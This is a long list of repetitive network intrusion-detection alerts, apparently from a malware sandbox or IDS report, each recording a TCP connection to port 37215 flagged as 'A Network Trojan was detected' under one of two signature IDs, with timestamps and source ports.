            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919357
            SID:2835222
            Source Port:59162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377590
            SID:2829579
            Source Port:46404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377852
            SID:2835222
            Source Port:59860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.051342
            SID:2829579
            Source Port:51414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945205
            SID:2829579
            Source Port:42220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412872
            SID:2835222
            Source Port:50944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.655802
            SID:2835222
            Source Port:58616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.026276
            SID:2829579
            Source Port:41102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927661
            SID:2829579
            Source Port:56470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.617103
            SID:2829579
            Source Port:55462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969538
            SID:2835222
            Source Port:51704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.078571
            SID:2835222
            Source Port:56338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.946826
            SID:2835222
            Source Port:49806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533116
            SID:2829579
            Source Port:51838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.597311
            SID:2835222
            Source Port:40716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026453
            SID:2835222
            Source Port:51400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.873112
            SID:2835222
            Source Port:55862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775548
            SID:2829579
            Source Port:59262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047854
            SID:2835222
            Source Port:39206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.441479
            SID:2829579
            Source Port:42598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880668
            SID:2835222
            Source Port:41584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.054014
            SID:2829579
            Source Port:49808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.626762
            SID:2829579
            Source Port:44462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979443
            SID:2829579
            Source Port:38974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.874265
            SID:2829579
            Source Port:41224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.049253
            SID:2829579
            Source Port:58196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069400
            SID:2835222
            Source Port:50790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507359
            SID:2835222
            Source Port:51286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.274904
            SID:2835222
            Source Port:36478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.617866
            SID:2829579
            Source Port:37636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806561
            SID:2829579
            Source Port:34516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.772893
            SID:2829579
            Source Port:40706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.368283
            SID:2829579
            Source Port:49570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745419
            SID:2835222
            Source Port:52986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999352
            SID:2835222
            Source Port:50204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735889
            SID:2829579
            Source Port:36372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.520745
            SID:2829579
            Source Port:32844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925558
            SID:2829579
            Source Port:43002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.597262
            SID:2829579
            Source Port:49890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280782
            SID:2829579
            Source Port:43760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596896
            SID:2835222
            Source Port:42676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.943292
            SID:2835222
            Source Port:45700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.388685
            SID:2829579
            Source Port:45414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.746141
            SID:2835222
            Source Port:52306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759870
            SID:2835222
            Source Port:41018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055919
            SID:2829579
            Source Port:50294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.811332
            SID:2835222
            Source Port:34860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999470
            SID:2835222
            Source Port:54634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931778
            SID:2829579
            Source Port:46360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748734
            SID:2835222
            Source Port:59206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939002
            SID:2835222
            Source Port:58574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555407
            SID:2829579
            Source Port:37904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604493
            SID:2835222
            Source Port:52640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.739165
            SID:2835222
            Source Port:40642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.470174
            SID:2835222
            Source Port:38114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434581
            SID:2829579
            Source Port:57762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.704975
            SID:2835222
            Source Port:59228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905909
            SID:2835222
            Source Port:60954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.989081
            SID:2835222
            Source Port:46752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756014
            SID:2835222
            Source Port:36002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.729347
            SID:2829579
            Source Port:40444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.817674
            SID:2835222
            Source Port:48916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988753
            SID:2835222
            Source Port:57818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.780007
            SID:2829579
            Source Port:44784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.508166
            SID:2829579
            Source Port:39776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.300092
            SID:2835222
            Source Port:47114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.075133
            SID:2835222
            Source Port:37124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817397
            SID:2835222
            Source Port:54282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031362
            SID:2829579
            Source Port:48956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730593
            SID:2835222
            Source Port:55800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.322177
            SID:2835222
            Source Port:46052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862278
            SID:2835222
            Source Port:41106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728151
            SID:2835222
            Source Port:50856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778376
            SID:2835222
            Source Port:59894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775504
            SID:2835222
            Source Port:44430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555338
            SID:2835222
            Source Port:53610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559901
            SID:2829579
            Source Port:46936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.010253
            SID:2829579
            Source Port:49060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864914
            SID:2835222
            Source Port:60980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.658721
            SID:2829579
            Source Port:53478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047952
            SID:2835222
            Source Port:41004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806264
            SID:2835222
            Source Port:33136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697373
            SID:2835222
            Source Port:51822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000207
            SID:2835222
            Source Port:50110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864971
            SID:2835222
            Source Port:44194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999482
            SID:2829579
            Source Port:60218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.860971
            SID:2835222
            Source Port:43824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956302
            SID:2835222
            Source Port:53192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:36.425220
            SID:2829579
            Source Port:56316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.953495
            SID:2835222
            Source Port:46350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507430
            SID:2829579
            Source Port:40874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.396995
            SID:2829579
            Source Port:57882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.687557
            SID:2829579
            Source Port:45942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880183
            SID:2829579
            Source Port:35040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.029352
            SID:2835222
            Source Port:46314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.284381
            SID:2835222
            Source Port:59536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.537090
            SID:2835222
            Source Port:34806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854134
            SID:2835222
            Source Port:47034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841869
            SID:2829579
            Source Port:42916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.544295
            SID:2835222
            Source Port:44526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040245
            SID:2829579
            Source Port:48444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.425907
            SID:2829579
            Source Port:55912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.054942
            SID:2829579
            Source Port:37960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927643
            SID:2829579
            Source Port:58670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.740458
            SID:2835222
            Source Port:57468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881238
            SID:2835222
            Source Port:49166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597269
            SID:2829579
            Source Port:37536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767381
            SID:2829579
            Source Port:59530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.732300
            SID:2835222
            Source Port:46124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.804870
            SID:2829579
            Source Port:57338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.316931
            SID:2829579
            Source Port:46776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.720730
            SID:2829579
            Source Port:51112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805626
            SID:2835222
            Source Port:41866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.998289
            SID:2835222
            Source Port:60008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.454314
            SID:2835222
            Source Port:50966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516691
            SID:2835222
            Source Port:50856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919994
            SID:2829579
            Source Port:38640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.041518
            SID:2829579
            Source Port:57602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320230
            SID:2829579
            Source Port:60928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004635
            SID:2829579
            Source Port:55408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853846
            SID:2835222
            Source Port:43380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842114
            SID:2835222
            Source Port:50876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723842
            SID:2835222
            Source Port:37902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.843491
            SID:2835222
            Source Port:46378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.822034
            SID:2829579
            Source Port:46238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.987528
            SID:2829579
            Source Port:42444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.582489
            SID:2829579
            Source Port:55424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.928178
            SID:2829579
            Source Port:39184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899829
            SID:2835222
            Source Port:51450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.493123
            SID:2829579
            Source Port:60598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872662
            SID:2835222
            Source Port:39020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855935
            SID:2835222
            Source Port:35256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421435
            SID:2829579
            Source Port:41640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059866
            SID:2835222
            Source Port:45160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067213
            SID:2829579
            Source Port:56280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778739
            SID:2835222
            Source Port:35964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857240
            SID:2835222
            Source Port:41924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002214
            SID:2835222
            Source Port:33066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716779
            SID:2835222
            Source Port:35124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.857940
            SID:2829579
            Source Port:51952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963503
            SID:2829579
            Source Port:34284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066960
            SID:2835222
            Source Port:44010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.961497
            SID:2835222
            Source Port:55328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777533
            SID:2829579
            Source Port:60286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.867927
            SID:2829579
            Source Port:58624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857369
            SID:2829579
            Source Port:38100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777510
            SID:2835222
            Source Port:53970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922246
            SID:2835222
            Source Port:51706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.618251
            SID:2829579
            Source Port:43746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766003
            SID:2835222
            Source Port:35992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.878846
            SID:2835222
            Source Port:55970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.317211
            SID:2835222
            Source Port:46694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.848471
            SID:2835222
            Source Port:35764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.542001
            SID:2835222
            Source Port:47054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739105
            SID:2835222
            Source Port:33046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507309
            SID:2835222
            Source Port:43692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.746069
            SID:2835222
            Source Port:55220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818222
            SID:2829579
            Source Port:34788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.745553
            SID:2829579
            Source Port:34672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765648
            SID:2829579
            Source Port:41252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.381764
            SID:2829579
            Source Port:37300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.602090
            SID:2829579
            Source Port:48792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.770894
            SID:2829579
            Source Port:60740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.928274
            SID:2835222
            Source Port:36698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935902
            SID:2835222
            Source Port:49386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.792686
            SID:2829579
            Source Port:55742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605360
            SID:2835222
            Source Port:53812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.729365
            SID:2829579
            Source Port:52492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.961276
            SID:2835222
            Source Port:42600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.516377
            SID:2829579
            Source Port:47886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.863097
            SID:2835222
            Source Port:45712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748679
            SID:2835222
            Source Port:38296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756406
            SID:2829579
            Source Port:43540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969839
            SID:2829579
            Source Port:60036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.524380
            SID:2829579
            Source Port:51556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.612639
            SID:2835222
            Source Port:38268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.740860
            SID:2835222
            Source Port:53970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307453
            SID:2829579
            Source Port:37872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893180
            SID:2829579
            Source Port:53928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900849
            SID:2829579
            Source Port:42760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.289385
            SID:2829579
            Source Port:42470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733280
            SID:2829579
            Source Port:49432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.667777
            SID:2835222
            Source Port:44056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.074273
            SID:2829579
            Source Port:45214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299214
            SID:2835222
            Source Port:34496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.860608
            SID:2829579
            Source Port:58254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935164
            SID:2829579
            Source Port:52822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505885
            SID:2835222
            Source Port:59230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.485971
            SID:2835222
            Source Port:45900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.321573
            SID:2835222
            Source Port:55712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864634
            SID:2829579
            Source Port:39974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276540
            SID:2835222
            Source Port:48940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.005860
            SID:2829579
            Source Port:59506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.760240
            SID:2829579
            Source Port:56310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.773678
            SID:2829579
            Source Port:42946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.018799
            SID:2835222
            Source Port:32878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757649
            SID:2835222
            Source Port:45500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
